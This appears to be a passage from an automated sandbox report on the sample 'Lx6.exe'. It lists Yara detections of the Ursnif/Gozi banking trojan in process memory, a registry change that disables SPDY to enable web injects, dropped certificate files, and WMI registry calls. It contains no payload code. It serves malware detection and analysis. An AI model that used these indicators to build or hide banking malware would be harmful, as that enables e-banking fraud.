Source: Yara match	File source: 00000000.00000003.389654961.000000000111C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000000.769688179.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.703497252.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000000.763965956.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.596069262.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.704474059.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000000.762259112.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.681894423.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000000.816576347.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000000.760746671.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.495743811.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.702640862.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000000.818431890.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000000.820005242.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.656463020.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000000.802729381.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.625911169.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.630294105.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.590960903.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.680178718.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.814285126.0000021F457F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.576910703.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.495247062.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.681232862.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.497852767.0000000001181000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000000.801073925.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000000.799390295.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.635166996.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.673085569.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

E-Banking Fraud

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.814825751.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.803878408.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.683117141.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000002.827171942.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.390766199.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.683052464.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.389500778.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.767821170.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682539634.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682736014.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000002.778497815.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.814713525.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.390744160.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000003.822550991.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000003.822358925.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682832881.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000003.775181381.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.803740044.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.389768028.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.708468891.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000003.775368587.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682410000.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682621929.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 5832, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 1920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: csc.exe PID: 5836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cvtres.exe PID: 1716, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: csc.exe PID: 3536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cvtres.exe PID: 5240, type: MEMORYSTR
Source: Yara match	File source: 0.3.Lx6.exe.d294a0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Lx6.exe.420000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.d294a0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.109d4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.109d4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.111c4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.1148948.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000043.00000000.773575293.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.389553565.000000000109D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493910135.000000000111D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000000.771438221.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.667603922.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.389654961.000000000111C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000000.769688179.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.703497252.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000000.763965956.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.596069262.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.704474059.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000000.762259112.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.681894423.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000000.816576347.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000000.760746671.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.495743811.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.702640862.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000000.818431890.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000000.820005242.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.656463020.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000000.802729381.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.625911169.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.630294105.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.590960903.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.680178718.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.814285126.0000021F457F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.576910703.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.495247062.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.681232862.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.497852767.0000000001181000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000000.801073925.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000000.799390295.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.635166996.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.673085569.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

Jump to behavior

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\7C7B.bin\AuthRoot.pfx			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\7C7B.bin\Root.pfx			Jump to dropped file

Source: cmd.exe

Process created: 51

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000058.00000003.814825751.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000058.00000003.803878408.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000023.00000003.683117141.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000059.00000002.827171942.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000023.00000003.683052464.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000003E.00000003.767821170.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000023.00000003.682539634.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000023.00000003.682736014.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000043.00000002.778497815.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000058.00000003.814713525.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000059.00000003.822550991.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000059.00000003.822358925.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000023.00000003.682832881.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000043.00000003.775181381.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000058.00000003.803740044.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000029.00000003.708468891.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000043.00000003.775368587.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000023.00000003.682410000.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000002.498174750.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000002.498174750.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000023.00000003.682621929.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: RuntimeBroker.exe PID: 3124, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: RuntimeBroker.exe PID: 4372, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: RuntimeBroker.exe PID: 4552, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: cmd.exe PID: 5832, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: cmd.exe PID: 1920, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: csc.exe PID: 5836, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: cvtres.exe PID: 1716, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: csc.exe PID: 3536, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: cvtres.exe PID: 5240, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown

Writes or reads registry keys via WMI

Source: C:\Users\user\Desktop\Lx6.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\Desktop\Lx6.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\Lx6.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
